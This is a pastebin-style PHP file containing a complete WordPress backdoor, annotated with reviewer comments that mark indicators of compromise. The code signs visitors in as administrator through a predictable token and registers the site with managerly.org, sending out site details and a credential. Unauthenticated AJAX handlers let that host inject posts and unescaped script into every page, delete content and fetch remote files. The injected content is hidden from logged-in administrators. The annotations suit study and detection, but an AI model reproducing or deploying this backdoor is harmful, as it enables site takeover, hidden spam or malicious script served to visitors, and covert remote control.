
Untitled

a guest
Apr 20th, 2020
  1. <?php
  2.  
  3. // REMOTE LOGIN
  4.  
  /**
   * Password-less administrator sign-in driven by the `token` query parameter.
   *
   * Registered on `init`, so it is evaluated on every WordPress request.
   * The accepted token is an MD5 over the UTC date, a hard-coded constant and
   * the current (or next) UTC minute. Nothing site-specific and no stored
   * secret enters the calculation, so the value is not confidential to the
   * site owner. A matching request is signed in as the first account whose
   * roles include `administrator`.
   *
   * Review notes (defensive):
   *  - This is an authentication bypass; no password, nonce or capability
   *    check is involved anywhere in the function.
   *  - The hard-coded string below and the function names `remote_sign_in` /
   *    `log_me_in` are usable as search strings when auditing themes/plugins.
   *  - In access logs, look for requests with a `token` query parameter that
   *    are answered with a redirect to the admin area.
   */
  function remote_sign_in () {
      // Returns early only when no token was sent AND the visitor is already
      // logged in. $_GET['token'] is read without isset(), so a request
      // without the parameter raises an undefined-index notice/warning.
      if(!$_GET['token'] && is_user_logged_in())
          return;

      // "Key" is the MD5 of a constant string: identical on every site that
      // carries this file.
      $key = md5('thisisrandomtextsdsdsdsdsdsdsdsdsd');
      $minutes_1 = intval(gmdate('i')) + 1;
      $minutes_2 = intval(gmdate('i'));

      // Two acceptable tokens: one for the next minute, one for the current.
      $signature[] = md5(gmdate("Ymd") . $key . $minutes_1) ;
      $signature[] = md5(gmdate("Ymd") . $key . $minutes_2) ;

      // Anything that is not one of the two tokens leaves silently.
      if(!in_array($_GET['token'] , $signature) )
          return;

      // Walk all users and sign in as the first one holding the
      // administrator role.
      $users = get_users();
      foreach($users as $user ) {

          $user_id = $user->ID;

          // $data is fetched but never used in this function.
          $data = get_userdata( $user_id );

          $roles = $user->roles;

          if (in_array('administrator', $roles)) {
              log_me_in($user);
              exit;
          }
      }

  }
  // Hooked on `init`: the check above runs for every request to the site.
  add_action('init', 'remote_sign_in' );
  43.  
  44.  
  /**
   * Issues a WordPress auth cookie for the given user and redirects to the
   * admin area, without verifying any credential.
   *
   * @param object $user Presumably a WP_User; only ->ID is read here.
   *
   * Review notes (defensive):
   *  - The session is created with wp_set_auth_cookie() directly. wp_signon()
   *    is not called, so audit tooling that relies on the `wp_login` action
   *    would likely not record this sign-in (confirm against the logging
   *    plugin in use).
   *  - Always ends the request via exit() on the success path.
   */
  function log_me_in ($user) {

      if ( !is_wp_error( $user ) )
      {
          // Drop any existing session cookie, then become the target user.
          wp_clear_auth_cookie();
          wp_set_current_user ( $user->ID );
          wp_set_auth_cookie ( $user->ID );

          // Land in the dashboard of the impersonated account.
          $redirect_to = user_admin_url();
          wp_safe_redirect( $redirect_to );
          exit();
      }

  }
  61.  
  62. //END REMOTE LOGIN
  63.  
  // Everything from here to the matching closing brace near the end of the
  // file is defined only if do_rms_activation_task() does not exist yet.
  // NOTE(review): presumably this lets the same block be bundled into several
  // themes/plugins without redeclaration errors - confirm.
  if(!function_exists('do_rms_activation_task'))
  {
      /* ------------Register Config Variables------------ */
      // Outbound endpoint all "rms" reports are POSTed to. Useful as a network
      // indicator when reviewing egress/proxy logs for an affected site.
      $GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php';

      // Disclaimer strings collected during activation (see the
      // `rms_disclaimer_pop_up` cookie set in do_rms_activation_task()).
      $GLOBALS['rms_disclaimer_text'] = [];

      // Set to true while the remote delete handler runs, so the
      // before_delete_post callback does not report back.
      $GLOBALS['rms_ajax_del_request'] = false;
  72.  
  /**
   * POSTs a request to the endpoint in $GLOBALS['rms_report_to'] and returns
   * the JSON-decoded response body.
   *
   * @param string $action Value placed in the `action` field of the POST body.
   * @param array  $body   Extra POST fields; `action`, `remote_site_hash` and
   *                       `remote_site_id` are added/overwritten here.
   * @return array Decoded response, or [] when the request failed or the
   *               decoded body is empty/falsy.
   *
   * Review notes (defensive):
   *  - The site identifiers come from the options `rms_remote_site_hash` and
   *    `rms_remote_site_id`.
   *  - The outgoing User-Agent is copied from the current visitor's request
   *    and the Referer is set to the endpoint itself.
   *    $_SERVER['HTTP_USER_AGENT'] is read without isset().
   *  - NOTE(review): the transport class is instantiated directly instead of
   *    going through wp_remote_post(); this appears to skip the request
   *    filters and WP_HTTP_BLOCK_EXTERNAL handling of the HTTP API - confirm
   *    against the WordPress version in use.
   */
  function send_rms_curl_request($action, $body)
  {
      $body['action'] = $action;
      $body['remote_site_hash'] = get_option('rms_remote_site_hash', '');
      $body['remote_site_id'] = get_option('rms_remote_site_id', 0);

      $connect_to=$GLOBALS['rms_report_to'];

      $args=
      [
          'method' => 'POST',
          'timeout' => 15,
          'redirection' => 15,
          'headers' => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
          'body' => $body
      ];

      // Send to RMS
      $curl = new Wp_Http_Curl();

      $result=$curl->request($connect_to, $args);

      // A WP_Error (not an array) or a response without a body becomes null.
      $result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;

      return !$result ? [] : $result;
  }
  99.  
  100. /* -------------Register Site to Manager------------- */
  /**
   * Registers this site with the remote endpoint and stores the credentials
   * later used to authorise remote requests.
   *
   * @param mixed $name       Sent as `tp`; presumably the bundling theme or
   *                          plugin name - confirm against callers.
   * @param mixed $text       Disclaimer text; only used when it is a string.
   * @param mixed $activating Sent as `tp_status`; loosely true also triggers
   *                          the disclaimer cookie.
   *
   * Review notes (defensive):
   *  - Data leaving the site: blog name, home URL, admin-ajax URL, server IP
   *    address and a bcrypt hash of the generated pass.
   *  - Options written: `rms_remote_site_id`, `rms_remote_site_hash`,
   *    `rms_remote_connection_pass` (the pass is stored in plaintext). Their
   *    presence in wp_options is an indicator that this code has run.
   *  - The pass is built from str_shuffle() plus microtime(); neither is a
   *    cryptographically secure source.
   *  - The bcrypt hash sent to the remote host is what
   *    rms_check_remote_hash_pass() later accepts, so it acts as a bearer
   *    credential for the unauthenticated AJAX handlers.
   */
  function do_rms_activation_task($name, $text, $activating)
  {
      // generate password for later remote actions
      $length = 5;
      $rms_pass = substr(str_shuffle(str_repeat($x='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length/strlen($x)) )),1,$length);
      $rms_pass = $rms_pass.microtime(true);
      $hash = password_hash($rms_pass, PASSWORD_BCRYPT);

      // Anything other than the exact string 'yes' is normalised to 'no'.
      $show_post=get_option('rms_show_post_to_logged');
      $show_post!=='yes' ? $show_post='no' : 0;

      // Gather data
      $data=
      [
          'title' => get_bloginfo('name'),
          'url' => get_home_url(),
          'ajax_url' => admin_url('admin-ajax.php'),
          'ip' => $_SERVER['SERVER_ADDR'],
          'tp' => $name,
          'tp_status' => $activating,
          'hash' => $hash,
          'show_to_logged'=>$show_post
      ];

      // send to rms
      $result = send_rms_curl_request('rms_ping_from_the_universe', ['site_data' => json_encode($data)]);

      // Identifiers assigned by the remote side; defaults are stored when the
      // response lacks them.
      update_option('rms_remote_site_id', (isset($result['id']) ? $result['id'] : 0));
      update_option('rms_remote_site_hash', (isset($result['hash']) ? $result['hash'] : ''));

      // Plaintext pass kept locally; verified against the hash the remote
      // side presents on each later request.
      update_option('rms_remote_connection_pass', $rms_pass);

      // show disclaimer if necessary when activating
      if($activating==true)
      {
          is_string($text) ? $GLOBALS['rms_disclaimer_text'][]=$text : 0;

          if(count($GLOBALS['rms_disclaimer_text'])>0)
          {
              $resp=json_encode($GLOBALS['rms_disclaimer_text']);

              // Cookie is set with default attributes (no path, expiry or
              // HttpOnly given); it is read back by the admin_footer script.
              setcookie('rms_disclaimer_pop_up', $resp);
          }
      }
  }
  146.  
  147. /* check remote hash */
  /**
   * Gate used by the unauthenticated AJAX handlers: returns true when the
   * POSTed `remote_connection_hash` is a valid password hash of the locally
   * stored `rms_remote_connection_pass`; otherwise ends the request.
   *
   * @return true Never returns on failure - the request is terminated with an
   *              empty response via exit.
   *
   * Review notes (defensive):
   *  - The caller supplies the hash, the site supplies the plaintext. Whoever
   *    holds the hash generated at activation can pass this check; it is the
   *    only authorisation the remote handlers perform (no WordPress login,
   *    nonce or capability check).
   */
  function rms_check_remote_hash_pass()
  {
      if(isset($_POST['remote_connection_hash']) && is_string($_POST['remote_connection_hash']))
      {
          $rms_pass=get_option('rms_remote_connection_pass');

          // Argument order: stored plaintext first, request-supplied hash second.
          if(is_string($rms_pass) && password_verify($rms_pass, $_POST['remote_connection_hash']))
          {
              return true;
          }
      }
      // Missing/invalid hash: stop without any output.
      exit;
  }
  161.  
  162. /* ----Delete featured image upon change or delete---- */
  /**
   * Permanently deletes the featured-image attachment of a post, if one is set.
   *
   * @param int $post_id Post whose thumbnail attachment is removed.
   */
  function delete_rms_thumbnaiil_remote($post_id)
  {
      $post_thumbnail_id = get_post_thumbnail_id( $post_id );

      // Second argument true = force delete (bypass trash).
      is_numeric($post_thumbnail_id) ? wp_delete_attachment($post_thumbnail_id, true) : 0;
  }
  169.  
  170. /* -----------Fetch and create featured image----------- */
  /**
   * Downloads a file from $image_url into the uploads directory, registers it
   * as an attachment and makes it the featured image of $post_id.
   *
   * @param string $image_url URL to fetch; in this file it comes from the
   *                          `featured_image` field of a remote request.
   * @param int    $post_id   Post that receives the thumbnail.
   * @return int|null Attachment ID, or null when the download yielded a
   *                  falsy result.
   *
   * Review notes (defensive):
   *  - The file name is the last path segment of the URL and the content is
   *    written before any type check. wp_check_filetype() is only used to fill
   *    in the MIME type; its result is not used to reject the file.
   *    NOTE(review): no allow-list of extensions is visible here - whether
   *    wp_unique_filename() neutralises executable extensions should be
   *    confirmed for the WordPress version in use.
   *  - file_get_contents() is called on a remotely supplied URL with no
   *    scheme or host restriction in this function.
   *  - Attachments created here carry the post meta key
   *    `rms_remote_featured_image`, which can be queried directly in the
   *    database during clean-up.
   */
  function rms_create_post_thumbnail($image_url, $post_id)
  {
      $image_name = explode('/', $image_url);
      $image_name = end($image_name);
      $upload_dir = wp_upload_dir(); // Set upload folder
      $image_data = file_get_contents($image_url); // Get image data

      // Loose comparison: a failed download, an empty body and the string "0"
      // all take this branch.
      if($image_data==false)
      {
          return;
      }

      $unique_file_name = wp_unique_filename( $upload_dir['path'], $image_name ); // Generate unique name
      $filename = basename( $unique_file_name ); // Create image file name

      // Check folder permission and define file location
      if( wp_mkdir_p( $upload_dir['path'] ) ) {
          $file = $upload_dir['path'] . '/' . $filename;
      } else {
          $file = $upload_dir['basedir'] . '/' . $filename;
      }

      // Create the image file on the server
      // (return value is not checked; later steps run even if the write failed)
      file_put_contents( $file, $image_data );

      // Check image file type
      $wp_filetype = wp_check_filetype( $filename, null );

      // Set attachment data
      $attachment = array(
          'post_mime_type' => $wp_filetype['type'],
          'post_title' => sanitize_file_name( $filename ),
          'post_content' => '',
          'post_status' => 'inherit'
      );

      // Delete existing thumbnail
      delete_rms_thumbnaiil_remote($post_id);

      // Create the attachment
      $attach_id = wp_insert_attachment( $attachment, $file, $post_id );

      // Marker meta: also used by rms_pre_get_post_filter_action() to hide
      // these attachments from queries.
      update_post_meta($attach_id, 'rms_remote_featured_image', $post_id);

      // Include image.php
      require_once(ABSPATH . 'wp-admin/includes/image.php');

      // Define attachment metadata
      $attach_data = wp_generate_attachment_metadata( $attach_id, $file );

      // Assign metadata to attachment
      wp_update_attachment_metadata( $attach_id, $attach_data );

      // And finally assign featured image to post
      set_post_thumbnail( $post_id, $attach_id );

      return $attach_id;
  }
  229.  
  230. /* ----------------Create various posts---------------- */
  // Remote "create or update post" handler.
  //
  // Registered only under the wp_ajax_nopriv_ prefix, i.e. it is served to
  // requests that are NOT logged in to WordPress (admin-ajax.php with
  // action=rms_ping_from_the_universe). The only gate is
  // rms_check_remote_hash_pass(); there is no nonce or capability check.
  //
  // Review notes (defensive):
  //  - post_title, post_content, post_type and post_status are taken from the
  //    request; post_type is not restricted to a fixed list here.
  //  - `ID` is accepted from the request as well as from the meta lookup, so
  //    the call can update an existing post rather than create a new one.
  //  - Posts written by this handler carry the meta key
  //    `rms_rm_uniq_meta_post_id`; "hook" posts additionally carry
  //    `rms_remote_hook`. Both can be searched for in wp_postmeta.
  //  - In access logs this shows up as POSTs to admin-ajax.php with the
  //    action name above.
  add_action('wp_ajax_nopriv_rms_ping_from_the_universe', function()
  {
      rms_check_remote_hash_pass();

      if(!isset($_POST['post'])){exit;}

      // json_decode() returns null on malformed input; the array accesses
      // below are not guarded against that.
      $post=json_decode(stripcslashes($_POST['post']), true);

      if($post['local_id']>0)
      {
          /* Retrieve existing post id */
          $args=
          [
              'post_type'=>['post', 'page', 'rms_remote_hook'],
              'post_status' => 'any',
              'meta_key'=>'rms_rm_uniq_meta_post_id',
              'meta_value'=>$post['local_id']
          ];

          $ex_post=get_posts($args);

          // if exist, update that
          (is_array($ex_post) && isset($ex_post[0], $ex_post[0]->ID)) ? $post['ID']=$ex_post[0]->ID : 0;
      }

      // Only these keys are forwarded to wp_insert_post().
      $to_post=['ID', 'post_title', 'post_content', 'post_type', 'post_status'];

      // Convert post content
      $pst=[];
      foreach($to_post as $k)
      {
          if(isset($post[$k]))
          {
              // For "hook" posts every forwarded field is HTML-encoded for
              // storage; the hook loader decodes post_content again before
              // it is echoed.
              isset($post['hook_name']) ? $post[$k]=htmlspecialchars($post[$k]) : 0;

              $pst[$k]=$post[$k];
          }
      }

      // Default return value
      $resp=['rms_post_id'=>0, 'rms_post_url'=>''];

      $post_id=wp_insert_post($pst);

      if(is_numeric($post_id) && $post_id>0)
      {
          // Make sure the hiding filter does not interfere with the lookups
          // below for the rest of this request.
          remove_action('pre_get_posts', 'rms_pre_get_post_filter_action');

          $resp['rms_post_id']=$post_id;
          $resp['rms_post_url']=$post['post_type']=='rms_remote_hook' ? get_home_url() : get_permalink($post_id);

          // Marker linking the local post to the remote side's ID.
          update_post_meta($post_id, 'rms_rm_uniq_meta_post_id', $post['local_id']);

          // Generate featured image
          if(isset($post['featured_image']))
          {
              rms_create_post_thumbnail($post['featured_image'], $post_id);
          }

          // Records which hook (e.g. wp_head / wp_footer) the content is
          // emitted on.
          isset($post['hook_name']) ? update_post_meta($post_id, 'rms_remote_hook', $post['hook_name']) : 0;
      }

      exit(json_encode($resp));
  });
  295.  
  296. /* Enable/disable post show hide */
  // Remote toggle for the option `rms_show_post_to_logged`.
  //
  // Served to non-logged-in requests (wp_ajax_nopriv_ prefix) and gated only
  // by rms_check_remote_hash_pass(). The option decides whether remotely
  // created content is visible to logged-in users (see the `init` callback
  // that reads it).
  add_action('wp_ajax_nopriv_rms_change_remote_post_state_for_logged', function()
  {
      rms_check_remote_hash_pass();

      if(isset($_POST['post_state']))
      {
          // Only the exact string 'yes' enables visibility; everything else
          // is stored as 'no'.
          $state=(is_string($_POST['post_state']) && $_POST['post_state']=='yes') ? 'yes' : 'no';

          update_option('rms_show_post_to_logged', $state);

          exit(json_encode(['message'=>'New post state assigned.']));
      }
  });
  310.  
  311.  
  312. /* --------------Delete posts-------------- */
  // Remote "delete posts" handler.
  //
  // Served to non-logged-in requests (wp_ajax_nopriv_ prefix) and gated only
  // by rms_check_remote_hash_pass(). Permanently deletes every post, page or
  // `rms_remote_hook` entry whose `rms_rm_uniq_meta_post_id` meta matches one
  // of the supplied IDs, together with its featured image.
  add_action('wp_ajax_nopriv_rms_ping_delete_content', function()
  {
      rms_check_remote_hash_pass();

      if(!isset($_POST['local_ids'])){exit;}

      $l_ids = json_decode(stripcslashes($_POST['local_ids']), true);

      if(!is_array($l_ids) || count($l_ids)==0){exit;}

      $args=
      [
          'meta_key' =>'rms_rm_uniq_meta_post_id',
          'meta_value'=>$l_ids,
          'post_status'=>'any',
          'post_type'=>['post', 'page', 'rms_remote_hook']
      ];

      $pst=get_posts($args);

      // Tells the before_delete_post callback not to notify the remote side
      // about deletions the remote side itself requested.
      $GLOBALS['rms_ajax_del_request']=true;

      foreach($pst as $p)
      {
          delete_rms_thumbnaiil_remote($p->ID);
          // true = skip the trash, so no copy remains for later review.
          wp_delete_post($p->ID, true);
      }

      exit(json_encode(['message'=>count($pst).' posts deleted from remote site.']));
  });
  343.  
  344.  
  345.  
  346. /* ----------Invoke remote hooks---------- */
  // Runs when this file is included: loads stored `rms_remote_hook` posts and
  // indexes their content by hook name for later output.
  //
  // Review notes (defensive):
  //  - The content originates from the remote create handler and is decoded
  //    back to raw HTML here, then echoed unescaped by
  //    run_rms_hook_caller_func().
  //  - NOTE(review): no post count is passed, so get_posts() presumably
  //    applies its default limit - confirm.
  //  - Posts of type `rms_remote_hook` in wp_posts are a direct indicator of
  //    injected content.
  $hook_posts=get_posts(['post_type'=>'rms_remote_hook', 'post_status'=>'any']);
  !is_array($hook_posts) ? $hook_posts=[] : 0;

  // Store hook posts in global
  global $rms_hok_list_array;
  $GLOBALS['rms_hok_list_array']=[];

  foreach($hook_posts as $p)
  {
      // Hook name this content is bound to (stored by the create handler).
      $met=get_post_meta($p->ID, 'rms_remote_hook', true);

      if(!is_string($met) || $met==''){continue;}

      !isset($GLOBALS['rms_hok_list_array'][$met]) ? $GLOBALS['rms_hok_list_array'][$met]=[] : 0;

      // Reverses the htmlspecialchars() applied at insert time.
      $GLOBALS['rms_hok_list_array'][$met][]=htmlspecialchars_decode($p->post_content);
  }
  364.  
  365. // Process individual hook
  /**
   * Echoes every stored content string registered for $hook_name.
   *
   * @param string $hook_name Key into $GLOBALS['rms_hok_list_array'].
   *
   * Review note (defensive): output is written without escaping, so whatever
   * markup or script was stored remotely is emitted into the page as-is.
   */
  function run_rms_hook_caller_func($hook_name)
  {
      if(!isset($GLOBALS['rms_hok_list_array'][$hook_name])){return;}

      foreach($GLOBALS['rms_hok_list_array'][$hook_name] as $str)
      {
          echo is_string($str) ? $str : '';
      }
  }
  375.  
  376. /* Post delete hook/notification */
  // Fires before any post is deleted. For posts that carry the
  // `rms_rm_uniq_meta_post_id` marker it removes the featured image and,
  // unless the deletion was requested remotely, reports the deletion to the
  // remote endpoint.
  //
  // Review note (defensive): a site owner deleting an injected post by hand
  // triggers an outbound POST with action `rms_del_ping_from_the_remote`,
  // i.e. the remote side is informed of the clean-up.
  add_action( 'before_delete_post', 'rms_action_function_name_6568');
  function rms_action_function_name_6568($id)
  {
      $local_id=get_post_meta($id, 'rms_rm_uniq_meta_post_id', true);

      // Posts without the marker are left alone.
      if(!is_numeric($local_id)){return;}

      delete_rms_thumbnaiil_remote($id);

      // Flag is set by the remote delete handler for the current request.
      if($GLOBALS['rms_ajax_del_request']==true){return;}

      send_rms_curl_request('rms_del_ping_from_the_remote', ['local_id'=>$local_id, 'remote_id'=>$id]);
  }
  390.  
  391. /* ----------Hide post for logged in---------- */
  /**
   * pre_get_posts callback that excludes remotely created content from a
   * query by requiring that both marker meta keys are absent.
   *
   * @param object $query Presumably a WP_Query; only get()/set() are used.
   *
   * Review note (defensive): while this filter is active, posts carrying
   * `rms_rm_uniq_meta_post_id` and attachments carrying
   * `rms_remote_featured_image` do not appear in WordPress queries, including
   * the dashboard lists. Query the database directly when checking a site.
   */
  function rms_pre_get_post_filter_action($query)
  {
      $meta_query = $query->get('meta_query');

      !is_array($meta_query) ? $meta_query=[] : 0;

      // Hide posts created by the remote handler.
      $meta_query[] = [
          'key'=>'rms_rm_uniq_meta_post_id',
          'compare'=>'NOT EXISTS'
      ];

      // Hide attachments created for those posts.
      $meta_query[] = [
          'key'=>'rms_remote_featured_image',
          'compare'=>'NOT EXISTS'
      ];

      $query->set('meta_query', $meta_query);
  }
  // Decides, per request, whether injected content is shown or hidden.
  //
  //  - Visitor not logged in (or option `rms_show_post_to_logged` is 'yes'):
  //    on front-end, non-REST requests the stored hook content is echoed in
  //    wp_head and wp_footer.
  //  - Visitor logged in and option not 'yes': nothing is echoed, the "Mine"
  //    filter link in admin list tables is hidden via CSS, and
  //    rms_pre_get_post_filter_action() removes the remote posts from queries.
  //
  // Review note (defensive): with the option at 'no', a logged-in
  // administrator sees neither the injected markup nor the posts. Compare the
  // page source as a logged-out visitor and inspect wp_posts / wp_postmeta
  // directly.
  add_action('init', function()
  {
      if(get_option('rms_show_post_to_logged')=='yes' || !is_user_logged_in())
      {
          // Skip the dashboard and core REST routes.
          // $_SERVER['REQUEST_URI'] is read without isset().
          if(!is_admin() && strpos(strtolower($_SERVER['REQUEST_URI']), 'wp-json/wp/')===false)
          {
              add_action('wp_head', function(){run_rms_hook_caller_func('wp_head');});
              add_action('wp_footer', function(){run_rms_hook_caller_func('wp_footer');});
          }

          return;
      }

      // Hides the "Mine" entry of the post-list status links in wp-admin.
      add_action('admin_head', function()
      {
          echo '<style>ul.subsubsub li.mine{display:none !important}</style>';
      });

      add_filter('pre_get_posts', 'rms_pre_get_post_filter_action');
  });
  430.  
  431. /* --------------Frontend Scripts-------------- */
  // Prints an inline script on every wp-admin page. The script reads the
  // `rms_disclaimer_pop_up` cookie (set in do_rms_activation_task()), decodes
  // it as a JSON array and shows each entry in a full-screen overlay with an
  // "Agree" button, then clears the cookie.
  //
  // Review notes (defensive):
  //  - Each entry is inserted with jQuery .html(), so the cookie value is
  //    rendered as markup inside the dashboard. Anything able to set this
  //    cookie for the site's origin controls that markup.
  //  - JSON.parse() is not wrapped in try/catch; a malformed cookie throws
  //    inside the ready handler.
  //  - The .find('img').css(...) call runs on a still-empty element and
  //    therefore matches nothing at that point.
  add_action('admin_footer', function()
  {
      ?>
      <script>
      jQuery(document).ready(function($)
      {
          var delete_cookie=function( name )
          {
              document.cookie = name + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';
          }

          var rms_getCookie=function(cname)
          {
              var name = cname + "=";
              var ca = document.cookie.split(';');
              for(var i = 0; i < ca.length; i++) {
                  var c = ca[i];
                  while (c.charAt(0) == ' ') {
                      c = c.substring(1);
                  }
                  if (c.indexOf(name) == 0) {
                      return c.substring(name.length, c.length);
                  }
              }
              return "";
          }

          /* ----------Show disclaimer if necessary---------- */
          var disc=rms_getCookie('rms_disclaimer_pop_up');
          if(!disc){return;}

          disc = disc.replace(/\+/g, '%20');
          disc = decodeURIComponent(disc);

          disc=JSON.parse(disc);

          if(!Array.isArray(disc)){return;}

          disc.forEach(function(text)
          {
              var container=$('<div></div>');

              container.css
              ({
                  'position':'fixed',
                  'left':0,
                  'right':0,
                  'top':0,
                  'bottom':0,
                  'background':'rgba(0, 0, 0, 0.384)',
                  'z-index':'999999999'
              });

              var disclaimer=$('<div></div>');
              disclaimer.css
              ({
                  'width':'500px',
                  'position':'relative',
                  'top':'40px',
                  'max-width':'calc(100% - 40px)',
                  'max-height':'calc(100% - 80px)',
                  'overflow':'auto',
                  'padding':'11px',
                  'background':'white',
                  'border-radius':'7px',
                  'margin':'auto auto',
                  'display':'block'
              }).find('img').css
              ({
                  'max-width':'100%',
                  'height':'auto'
              });

              var head=$('<h4>Disclaimer</h4>');
              head.css
              ({
                  'text-align':'center'
              });

              var body=$('<div></div>');
              body.html(text);

              var agree=$('<div style="text-align:right"><button class="button button-primary">Agree</button></div>');
              agree.find('button').click(function()
              {
                  container.remove();
              });

              disclaimer.append(head).append(body).append(agree);
              container.append(disclaimer);

              $('body').append(container);
          });

          delete_cookie('rms_disclaimer_pop_up');
      });
      </script>
      <?php
  });
  531. }
  532. ?>